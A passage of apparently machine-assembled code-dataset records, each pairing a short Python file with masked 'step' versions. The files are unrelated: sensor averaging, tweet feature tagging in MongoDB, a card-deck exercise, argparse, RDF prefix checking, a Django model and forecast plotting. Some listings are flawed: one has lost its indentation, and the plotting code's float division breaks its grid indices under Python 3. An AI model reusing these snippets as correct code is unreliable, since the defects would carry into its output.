"step-4": "def twoSensorAvg(input_data, duration=1):\n times = {}\n for i in input_data:\n data = i.split(',')\n time = int(int(data[1]) / (duration * 1000))\n if time not in times:\n times[time] = [0, 0]\n times[time][0] += int(data[2])\n times[time][1] += 1\n ans = []\n for i, v in times.items():\n i = int(i)\n a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *\n (duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))\n ans.append(a)\n return ans\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\nif __name__ == '__main__':\n input_data = ['1,10000,40', '1,10002,45', '1,11015,50', '2,10005,42',\n '2,11051,45', '2,12064,42', '2,13161,42']\n ans = ['10000-10999: 42.33', '11000-11999: 47.5', '12000-12999: 42.0',\n '13000-13999: 42.0']\n print(test(input_data, ans, 1))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Created on Sep 23, 2016
@author: Andrew
'''
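
# Note: this script is Python 2 (print statements and ur"" literals); it will
# not run under Python 3 without converting the prints to print(...) and the
# ur"..." patterns to r"..." strings.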
from pymongo import MongoClient
import re
client = MongoClient()
atMentions = re.compile(ur"@\w+", flags=re.I|re.U)
atMidnight = re.compile(u"@midnight", flags=re.I|re.U)
hashtag = re.compile(ur"#\w+", flags=re.I|re.U)
features = [("usf fwa forward most", "usf fwa backward most", "usf fwa difference most", "usf fwa difference most sign"), ("usf fwa forward least", "usf fwa backward least", "usf fwa difference least", "usf fwa difference least sign"), ("usf fwa forward average", "usf fwa backward average", "usf fwa difference average", "usf fwa difference average sign")]
cols = ["GentlerSongs", "OlympicSongs", "OceanMovies", "BoringBlockbusters"]
p_values = []
for featureF, featureB, featureD, featureS in features:
print "Testing {} vs {}".format(featureF, featureB)
lessMoreDiff = [] #holds difference in feature value for less funny - more funny
for col in cols:
tweets = []
for tweet in client.tweets[col].find({"$and" : [{"total likes" : {"$gte" : 7}}, {featureF : {"$exists" : True}}, {featureB : {"$exists" : True}}]}):
if "punch words" not in tweet:
continue
if (tweet["punch words"] == None) or (tweet["punch words"] == []):
continue
for word in tweet["punch words"]:
if word == "None":
continue
if not word:
continue
mentions = atMentions.findall(tweet["text"])
            if len(mentions) > 1: #if more than 1 person is mentioned
continue
elif len(mentions) == 1:
                if not atMidnight.match(mentions[0]): #if they mention someone other than @midnight
continue
if len(hashtag.findall(tweet["text"])) > 1: #if there's more than 1 hashtag
continue
if (tweet[featureF] > 0) and (tweet[featureB] > 0):
tweet[featureD] = tweet[featureF] - tweet[featureB]
sign = 0 #assume forward and back are equal
if (tweet[featureF] - tweet[featureB]) > 0:
sign = 1
elif ((tweet[featureF] - tweet[featureB])) < 0:
sign = -1
tweet[featureS] = sign
client.tweets[col].update({"_id" : tweet["_id"]}, tweet)
|
normal
|
{
"blob_id": "eb2bb06afb9aeb46ad02cbac145ccd817131074d",
"index": 1753,
"step-1": "'''\r\nCreated on Sep 23, 2016\r\n\r\n@author: Andrew\r\n'''\r\nfrom pymongo import MongoClient\r\nimport re\r\n\r\nclient = MongoClient()\r\n\r\natMentions = re.compile(ur\"@\\w+\", flags=re.I|re.U)\r\natMidnight = re.compile(u\"@midnight\", flags=re.I|re.U)\r\nhashtag = re.compile(ur\"#\\w+\", flags=re.I|re.U)\r\nfeatures = [(\"usf fwa forward most\", \"usf fwa backward most\", \"usf fwa difference most\", \"usf fwa difference most sign\"), (\"usf fwa forward least\", \"usf fwa backward least\", \"usf fwa difference least\", \"usf fwa difference least sign\"), (\"usf fwa forward average\", \"usf fwa backward average\", \"usf fwa difference average\", \"usf fwa difference average sign\")]\r\ncols = [\"GentlerSongs\", \"OlympicSongs\", \"OceanMovies\", \"BoringBlockbusters\"]\r\np_values = []\r\nfor featureF, featureB, featureD, featureS in features:\r\n print \"Testing {} vs {}\".format(featureF, featureB)\r\n lessMoreDiff = [] #holds difference in feature value for less funny - more funny\r\n for col in cols:\r\n tweets = []\r\n for tweet in client.tweets[col].find({\"$and\" : [{\"total likes\" : {\"$gte\" : 7}}, {featureF : {\"$exists\" : True}}, {featureB : {\"$exists\" : True}}]}):\r\n if \"punch words\" not in tweet:\r\n continue\r\n if (tweet[\"punch words\"] == None) or (tweet[\"punch words\"] == []):\r\n continue\r\n for word in tweet[\"punch words\"]:\r\n if word == \"None\":\r\n continue\r\n if not word:\r\n continue\r\n mentions = atMentions.findall(tweet[\"text\"])\r\n if len(mentions) > 1: #if more than 1 person is mentione\r\n continue\r\n elif len(mentions) == 1:\r\n if not atMidnight.match(mentions[0]): #if the mention someone other than @midngiht\r\n continue\r\n if len(hashtag.findall(tweet[\"text\"])) > 1: #if there's more than 1 hashtag\r\n continue\r\n \r\n if (tweet[featureF] > 0) and (tweet[featureB] > 0):\r\n tweet[featureD] = tweet[featureF] - tweet[featureB]\r\n sign = 0 #assume forward and back are equal\r\n if (tweet[featureF] - tweet[featureB]) > 0:\r\n sign = 1\r\n elif ((tweet[featureF] - tweet[featureB])) < 0:\r\n sign = -1\r\n tweet[featureS] = sign\r\n client.tweets[col].update({\"_id\" : tweet[\"_id\"]}, tweet)\r\n \r\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
cardlist = []
card = []
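# Note: the expected stdin format appears to be the number of missing cards n
# on the first line, followed by n lines like "S 1" (suit and rank); the code
# then prints every card absent from the full 52-card deck.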
for j in range(1,5):
for k in range(1,14):
if j == 1:
cardlist.append(["S", "{}".format(k)])
elif j == 2:
cardlist.append(["H", "{}".format(k)])
elif j == 3:
cardlist.append(["C", "{}".format(k)])
elif j == 4:
cardlist.append(["D", "{}".format(k)])
num = int(input())
for i in range(num):
card.append(input().split())
for i in range(num):
cardlist.remove(card[i])
for i in range(52-num):
print("{0} {1}".format(cardlist[i][0], cardlist[i][1]))
|
normal
|
{
"blob_id": "937a101cf5c7e943fc62d18b77357eea151fdfaf",
"index": 7789,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor j in range(1, 5):\n for k in range(1, 14):\n if j == 1:\n cardlist.append(['S', '{}'.format(k)])\n elif j == 2:\n cardlist.append(['H', '{}'.format(k)])\n elif j == 3:\n cardlist.append(['C', '{}'.format(k)])\n elif j == 4:\n cardlist.append(['D', '{}'.format(k)])\n<mask token>\nfor i in range(num):\n card.append(input().split())\nfor i in range(num):\n cardlist.remove(card[i])\nfor i in range(52 - num):\n print('{0} {1}'.format(cardlist[i][0], cardlist[i][1]))\n",
"step-3": "cardlist = []\ncard = []\nfor j in range(1, 5):\n for k in range(1, 14):\n if j == 1:\n cardlist.append(['S', '{}'.format(k)])\n elif j == 2:\n cardlist.append(['H', '{}'.format(k)])\n elif j == 3:\n cardlist.append(['C', '{}'.format(k)])\n elif j == 4:\n cardlist.append(['D', '{}'.format(k)])\nnum = int(input())\nfor i in range(num):\n card.append(input().split())\nfor i in range(num):\n cardlist.remove(card[i])\nfor i in range(52 - num):\n print('{0} {1}'.format(cardlist[i][0], cardlist[i][1]))\n",
"step-4": "cardlist = []\ncard = []\n\nfor j in range(1,5):\n for k in range(1,14):\n if j == 1:\n cardlist.append([\"S\", \"{}\".format(k)])\n elif j == 2:\n cardlist.append([\"H\", \"{}\".format(k)])\n elif j == 3:\n cardlist.append([\"C\", \"{}\".format(k)])\n elif j == 4:\n cardlist.append([\"D\", \"{}\".format(k)])\n\nnum = int(input())\n\nfor i in range(num):\n card.append(input().split())\n\nfor i in range(num):\n cardlist.remove(card[i])\n\nfor i in range(52-num):\n print(\"{0} {1}\".format(cardlist[i][0], cardlist[i][1]))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
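
For reference, the 52-card list that the nested loops above build can also be written with itertools.product; this equivalent sketch (including the `suits` name) is an editorial addition, not part of the original submission:

```python
from itertools import product

suits = ['S', 'H', 'C', 'D']
# same suit-then-rank order as the nested loops in the record above
cardlist = [[suit, str(rank)] for suit, rank in product(suits, range(1, 14))]
assert len(cardlist) == 52 and cardlist[0] == ['S', '1']
```
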
import argparse
def parse_args():
"""
Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.
:return: Populated namespace.
"""
parser = argparse.ArgumentParser(description='baseline Mask R-CNN')
parser.add_argument('--dataset', required=True,
metavar="/path/to/dataset/",
help='Directory of the dataset')
parser.add_argument('--continue_train', type=str, required=False, default='None',
metavar="/path/to/latest/weights.h5", help="Path to lastest training weights .h5 file")
parser.add_argument('--weight', required=False,
metavar='/path/to/pretrained/weight.h5', help="Path to trained weight")
parser.add_argument('--image', required=False,
metavar='/path/to/testing/image/directory', help="Path to testing image directory")
parser.add_argument('--video', required=False,
metavar='/path/to/testing/image/directory', help="Path to testing image directory")
return parser.parse_args()
|
normal
|
{
"blob_id": "b6527a09f346ee1b7dd446a0ff21995a995481a8",
"index": 6640,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True, metavar=\n '/path/to/dataset/', help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False,\n default='None', metavar='/path/to/latest/weights.h5', help=\n 'Path to lastest training weights .h5 file')\n parser.add_argument('--weight', required=False, metavar=\n '/path/to/pretrained/weight.h5', help='Path to trained weight')\n parser.add_argument('--image', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n parser.add_argument('--video', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n return parser.parse_args()\n",
"step-3": "import argparse\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True, metavar=\n '/path/to/dataset/', help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False,\n default='None', metavar='/path/to/latest/weights.h5', help=\n 'Path to lastest training weights .h5 file')\n parser.add_argument('--weight', required=False, metavar=\n '/path/to/pretrained/weight.h5', help='Path to trained weight')\n parser.add_argument('--image', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n parser.add_argument('--video', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n return parser.parse_args()\n",
"step-4": "import argparse\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True,\n metavar=\"/path/to/dataset/\",\n help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False, default='None',\n metavar=\"/path/to/latest/weights.h5\", help=\"Path to lastest training weights .h5 file\")\n parser.add_argument('--weight', required=False,\n metavar='/path/to/pretrained/weight.h5', help=\"Path to trained weight\")\n parser.add_argument('--image', required=False,\n metavar='/path/to/testing/image/directory', help=\"Path to testing image directory\")\n parser.add_argument('--video', required=False,\n metavar='/path/to/testing/image/directory', help=\"Path to testing image directory\")\n return parser.parse_args()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
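
A minimal usage sketch for the parse_args() helper above; the module name train_args and the argument values are hypothetical (only --dataset is required by the parser):

```python
import sys

from train_args import parse_args  # hypothetical module containing the helper above

if __name__ == '__main__':
    # simulate a command line so the sketch runs without real CLI input
    sys.argv = ['train.py', '--dataset', '/data/mmfit/', '--weight', 'mask_rcnn.h5']
    args = parse_args()
    print(args.dataset, args.continue_train, args.weight, args.image, args.video)
```
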
#Checks if all declared prefixes are used in the RDF File
import glob
import logging
import sys
import Utility as utility
import re
# set log level
logging.basicConfig(level=logging.INFO)
root_path = "../"
rdf_file_extension = {".ttl":"turtle", ".nt":"nt", ".rdf":"application/rdf+xml"}
regex_prefix = {".ttl": r'@prefix(.*?)\n', ".rdf": r'xmlns:(.*?)\n'}
regex_url = {".ttl": r'\<(.*?)\>', ".rdf": r'\"(.*?)\"'}
regex_splitter = {".ttl": ":", ".nt":"nt", ".rdf":"="}
for extension in rdf_file_extension.keys() :
files_to_check = "**/*" + extension
for filename in glob.iglob(root_path + files_to_check, recursive=True):
logging.info("Validating file " + filename)
try:
#Parse file using rdflib
g = utility.parseGraph(filename, rdf_file_extension[extension])
#Read File
content = utility.readFile(filename)
#Get Declared prefixes
declared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])
#Check redundant declaration
duplicated_prefixes = utility.findDuplicates(declared_prefixes)
#If redundant, raise exception
if len(duplicated_prefixes) > 0:
msg = utility.getErrorMessage(duplicated_prefixes)
raise Exception("Duplicated prefix declaration: {}".format(msg))
if(extension == '.ttl'):
#Remove prefixes from content
content = re.sub(r'@prefix(.*?)\n', '', content)
#Check for prefix usage
unused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)
elif(extension == '.rdf'):
#Check for prefix usage
used_prefixes = utility.getUsedPrefixesRDF(g)
unused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)
#If there are unused prefixes, raise exception
if len(unused_prefixes) > 0:
msg = utility.getErrorMessage(unused_prefixes)
raise Exception("Unused prefixes:\n {}".format(msg))
except Exception as e:
logging.error(e)
logging.error("Syntaxic error reading turtle file [" +filename+"]")
sys.exit(1)
print("Files syntaxic validation is successful")
|
normal
|
{
"blob_id": "fe406f40b48bf4982e7a48737b6b30514ae1fa71",
"index": 7915,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n<mask token>\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO)\nroot_path = '../'\nrdf_file_extension = {'.ttl': 'turtle', '.nt': 'nt', '.rdf':\n 'application/rdf+xml'}\nregex_prefix = {'.ttl': '@prefix(.*?)\\\\n', '.rdf': 'xmlns:(.*?)\\\\n'}\nregex_url = {'.ttl': '\\\\<(.*?)\\\\>', '.rdf': '\\\\\"(.*?)\\\\\"'}\nregex_splitter = {'.ttl': ':', '.nt': 'nt', '.rdf': '='}\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-4": "import glob\nimport logging\nimport sys\nimport Utility as utility\nimport re\nlogging.basicConfig(level=logging.INFO)\nroot_path = '../'\nrdf_file_extension = {'.ttl': 'turtle', '.nt': 'nt', '.rdf':\n 'application/rdf+xml'}\nregex_prefix = {'.ttl': '@prefix(.*?)\\\\n', '.rdf': 'xmlns:(.*?)\\\\n'}\nregex_url = {'.ttl': '\\\\<(.*?)\\\\>', '.rdf': '\\\\\"(.*?)\\\\\"'}\nregex_splitter = {'.ttl': ':', '.nt': 'nt', '.rdf': '='}\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-5": "#Checks if all declared prefixes are used in the RDF File\n\nimport glob\nimport logging\nimport sys\nimport Utility as utility\nimport re\n\n# set log level\nlogging.basicConfig(level=logging.INFO)\n\nroot_path = \"../\"\n\nrdf_file_extension = {\".ttl\":\"turtle\", \".nt\":\"nt\", \".rdf\":\"application/rdf+xml\"}\nregex_prefix = {\".ttl\": r'@prefix(.*?)\\n', \".rdf\": r'xmlns:(.*?)\\n'}\nregex_url = {\".ttl\": r'\\<(.*?)\\>', \".rdf\": r'\\\"(.*?)\\\"'}\nregex_splitter = {\".ttl\": \":\", \".nt\":\"nt\", \".rdf\":\"=\"}\n\nfor extension in rdf_file_extension.keys() :\n\tfiles_to_check = \"**/*\" + extension\n\t\t\n\tfor filename in glob.iglob(root_path + files_to_check, recursive=True):\n\t\tlogging.info(\"Validating file \" + filename)\n\n\t\ttry:\n\t\t\t#Parse file using rdflib\n\t\t\tg = utility.parseGraph(filename, rdf_file_extension[extension])\n\n\t\t\t#Read File\n\t\t\tcontent = utility.readFile(filename)\n\n\t\t\t#Get Declared prefixes\n\t\t\tdeclared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])\n\n\t\t\t#Check redundant declaration\n\t\t\tduplicated_prefixes = utility.findDuplicates(declared_prefixes)\n\t\t\t\n\t\t\t#If redundant, raise exception\n\t\t\tif len(duplicated_prefixes) > 0:\n\t\t\t\tmsg = utility.getErrorMessage(duplicated_prefixes)\n\t\t\t\traise Exception(\"Duplicated prefix declaration: {}\".format(msg))\n\n\t\t\tif(extension == '.ttl'):\n\t\t\t\t#Remove prefixes from content\n\t\t\t\tcontent = re.sub(r'@prefix(.*?)\\n', '', content)\n\n\t\t\t\t#Check for prefix usage\n\t\t\t\tunused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)\n\n\t\t\telif(extension == '.rdf'):\n\t\t\t\t#Check for prefix usage\n\t\t\t\tused_prefixes = utility.getUsedPrefixesRDF(g)\n\t\t\t\tunused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)\n\n\t\t\t#If there are unused prefixes, raise exception\n\t\t\tif len(unused_prefixes) > 0:\n\t\t\t\tmsg = utility.getErrorMessage(unused_prefixes)\n\t\t\t\traise Exception(\"Unused prefixes:\\n {}\".format(msg))\n\n\t\texcept Exception as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tlogging.error(\"Syntaxic error reading turtle file [\" +filename+\"]\")\n\t\t\t\tsys.exit(1)\n\nprint(\"Files syntaxic validation is successful\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
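
The Utility helpers used above are not shown in the record; purely to illustrate what the Turtle @prefix regex and splitter extract, here is a tiny standalone sketch on a made-up snippet (variable names are illustrative):

```python
import re

ttl = ('@prefix ex: <http://example.org/> .\n'
       '@prefix foaf: <http://xmlns.com/foaf/0.1/> .\n'
       'ex:alice foaf:name "Alice" .\n')

# same pattern and splitter as regex_prefix['.ttl'] and regex_splitter['.ttl'] above
declarations = re.findall(r'@prefix(.*?)\n', ttl)
declared_prefixes = [d.split(':')[0].strip() for d in declarations]
print(declared_prefixes)  # ['ex', 'foaf']
```
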
from django.db import models
from orders.constants import OrderStatus
from subscriptions.models import Subscription
class Order(models.Model):
subscription = models.OneToOneField(
Subscription,
on_delete=models.CASCADE,
related_name='order',
)
order_status = models.CharField(
max_length=50,
choices=OrderStatus.Choices,
default=OrderStatus.IN_PROGRESS,
)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
email = models.EmailField()
price = models.DecimalField(max_digits=10, decimal_places=2)
# def get_email(self):
# if self.email is None:
# self.email = Subscription.objects.get(client__email=...)
|
normal
|
{
"blob_id": "78ddae64cc576ebaf7f2cfaa4553bddbabe474b7",
"index": 6918,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Order(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(Subscription, on_delete=models.\n CASCADE, related_name='order')\n order_status = models.CharField(max_length=50, choices=OrderStatus.\n Choices, default=OrderStatus.IN_PROGRESS)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n",
"step-4": "from django.db import models\nfrom orders.constants import OrderStatus\nfrom subscriptions.models import Subscription\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(Subscription, on_delete=models.\n CASCADE, related_name='order')\n order_status = models.CharField(max_length=50, choices=OrderStatus.\n Choices, default=OrderStatus.IN_PROGRESS)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n",
"step-5": "from django.db import models\n\nfrom orders.constants import OrderStatus\nfrom subscriptions.models import Subscription\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(\n Subscription,\n on_delete=models.CASCADE,\n related_name='order',\n )\n order_status = models.CharField(\n max_length=50,\n choices=OrderStatus.Choices,\n default=OrderStatus.IN_PROGRESS,\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n\n # def get_email(self):\n # if self.email is None:\n # self.email = Subscription.objects.get(client__email=...)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
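
A hypothetical usage sketch for the Order model above; the import paths, helper name, and field values are assumptions, and it presumes a configured Django project containing the orders and subscriptions apps:

```python
from decimal import Decimal

from orders.models import Order                  # assumed module path for the model above
from subscriptions.models import Subscription


def open_order(subscription_id):
    """Create an Order for an existing subscription; order_status keeps its IN_PROGRESS default."""
    subscription = Subscription.objects.get(pk=subscription_id)
    return Order.objects.create(
        subscription=subscription,
        email='[email protected]',        # placeholder value
        price=Decimal('9.99'),            # placeholder value
    )
```
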
"""Produce a multi-panel figure of each output lead time in a forecast
"""
import matplotlib.pyplot as plt
import iris.plot as iplt
from irise import convert
from irise.plot.util import add_map
from myscripts import plotdir
from myscripts.models.um import case_studies
columns = 3
def main(forecast, name, levels, *args, **kwargs):
nt = len(forecast)
rows = (nt / columns) + 1
fig = plt.figure(figsize=(18, 10 * float(rows) / columns))
for n, cubes in enumerate(forecast):
row = n / columns
column = n - row * columns
print(row, column)
ax = plt.subplot2grid((rows, columns), (row, column))
cube = convert.calc(name, cubes, levels=levels)[0]
im = iplt.pcolormesh(cube, *args, **kwargs)
add_map()
ax = plt.subplot2grid((rows, columns), (row, column + 1))
cbar = plt.colorbar(im, cax=ax, orientation='horizontal')
plt.savefig(plotdir + name + '_' + str(levels[0]) +
'_' + str(levels[1][0]) + '.png')
return
if __name__ == '__main__':
forecast = case_studies.generate_season_forecast(2013, 11, 1)
name = 'ertel_potential_vorticity'
levels = ('air_potential_temperature', [320])
main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')
|
normal
|
{
"blob_id": "310e6e693cdce6ff71d06eac86214a21bef236d4",
"index": 7425,
"step-1": "<mask token>\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-3": "<mask token>\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-4": "<mask token>\nimport matplotlib.pyplot as plt\nimport iris.plot as iplt\nfrom irise import convert\nfrom irise.plot.util import add_map\nfrom myscripts import plotdir\nfrom myscripts.models.um import case_studies\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
